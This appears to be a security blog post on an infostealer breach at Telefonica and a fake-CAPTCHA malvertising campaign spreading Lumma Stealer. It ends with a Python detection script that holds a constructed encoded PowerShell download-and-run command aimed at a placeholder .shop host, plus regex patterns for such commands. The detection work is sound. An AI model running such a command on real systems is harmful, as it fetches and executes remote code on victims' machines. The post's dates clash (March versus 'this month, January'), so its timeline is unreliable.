Infostealer Alert: How Fake CAPTCHA Pages Manipulate Windows Users to Run Dangerous PowerShell Commands

Posted on March 17, 2025
Spanish telecommunications giant Telefonica recently fell victim to a significant cybersecurity breach, showing that even large organizations can be vulnerable. The event highlights how important it is to maintain strong defenses, especially against infostealers, which are designed specifically to steal information.
The Breach: What Happened?
This month (January 2025), Telefonica confirmed unauthorized access to its internal Jira ticketing system. The breach, orchestrated by a group of attackers allegedly linked to the Hellcat ransomware group, resulted in the theft of approximately 2.3 GB of sensitive data. The stolen information included:
- 24,000 employee emails and names
- 500,000 Jira issues and summaries
- 5,000 internal documents
- 236,493 lines of customer data
The Attack Vector: Infostealer Malware
The breach was facilitated by infostealer malware, a type of malicious software designed to harvest sensitive information such as login credentials from infected devices. Numerous employees were reported to be compromised, providing attackers with critical credentials for initial access:
- 469 employee credentials on Telefonica’s domain were compromised.
Cybercriminals have launched a massive malvertising campaign that tricks users with fake CAPTCHA pages. The operation, dubbed “DeceptionAds” by security researchers, is distributing Lumma Stealer malware at an alarming rate. We’re talking over a million daily ad impressions across more than 3,000 websites. That’s a lot of potential victims.
Beware: DeceptionAds campaign using fake CAPTCHAs to spread Lumma Stealer malware across thousands of websites daily.
Here’s how it works. Users see what looks like a normal ad. They click. Suddenly, they’re redirected to a fake CAPTCHA page. But instead of the usual “I’m not a robot” checkbox, they’re instructed to copy and paste a command into their Windows Run dialog. Sneaky JavaScript automatically copies an obfuscated PowerShell command to their clipboard. One paste later, and boom—they’ve downloaded Lumma Stealer. The campaign leverages Monetag ad scripts to distribute these fake CAPTCHA pages at massive scale. A real-world infection timeline shows victims can go from searching for common software to complete system compromise in under a minute.
The malware is nasty. It grabs passwords, cookies, browser data. It hunts for cryptocurrency wallets and financial information. It even searches files for specific keywords that might indicate valuable data. This type of attack exemplifies how exploit kits target vulnerable browsers to deliver infostealer malware. And once it’s done collecting your digital life, it sends everything to command-and-control servers using “.shop” domains.
The technical aspects are pretty sophisticated. The PowerShell script contains an AES-encrypted payload with a hardcoded decryption key. It downloads two zip files and executes the Lumma Stealer executable. All this happens behind the scenes while users think they’re just completing a CAPTCHA.
Security researchers believe the “Vane Viper” threat actor is behind this campaign. They’re known for exploiting weaknesses in digital advertising ecosystems. They use BeMob cloaking services to evade detection and Cloudflare CDN for payload delivery.
The evasion techniques are impressive, if not infuriating. Obfuscated code, base64 encoding, legitimate ad networks as cover. They’re constantly updating their malicious pages with new variants.
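To give defenders a concrete handle on the paste-into-Run pattern described above, here is an added detection example (not from the original post or its authors): it scores constructed Sysmon-style process-creation records for explorer.exe spawning PowerShell with hidden-window, policy-bypass, download-cradle and .shop indicators, decoding the -EncodedCommand argument first so that base64 does not hide the keywords. The event field names, the alert threshold and the placeholder .shop domain are assumptions.

```python
import base64
import re

# Constructed Sysmon-style process-creation records, not real telemetry; the .shop
# domain and the encoded command are placeholders built for this example.
_FAKE_PAYLOAD = "iex (iwr 'https://constructed-c2.shop/x.txt' -UseBasicParsing)"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc "
                    + base64.b64encode(_FAKE_PAYLOAD.encode("utf-16le")).decode()},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

INDICATORS = {  # command-line traits of the clipboard-delivered PowerShell one-liner
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    "shop_tld": re.compile(r"https?://[^\s'\"]+\.shop\b", re.I),
}
ENCODED = re.compile(r"-e(ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)  # -enc <b64 UTF-16LE>
SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\mshta.exe")


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand text so keywords hidden by encoding can be matched."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(2), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # malformed base64 or UTF-16: leave as is
        return cmdline
    return f"{cmdline} <decoded:{decoded}>"


def classify(event: dict) -> dict:
    """Score one event: Run-dialog lineage (explorer.exe -> script host) plus indicators."""
    full = expand_encoded(event["CommandLine"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(full)]
    if ENCODED.search(event["CommandLine"]):
        hits.append("encoded_command")
    lineage = (event["ParentImage"].lower().endswith("\\explorer.exe")
               and event["Image"].lower().endswith(SCRIPT_HOSTS))
    # Alert when the lineage matches and at least two indicators are present.
    return {"run_dialog_lineage": lineage, "indicators": hits, "alert": lineage and len(hits) >= 2}
```

In production the same logic applies to Windows Security Event ID 4688 (with command-line auditing enabled) or Sysmon Event ID 1, and the RunMRU registry key under HKCU keeps a record of what was pasted into the Run dialog.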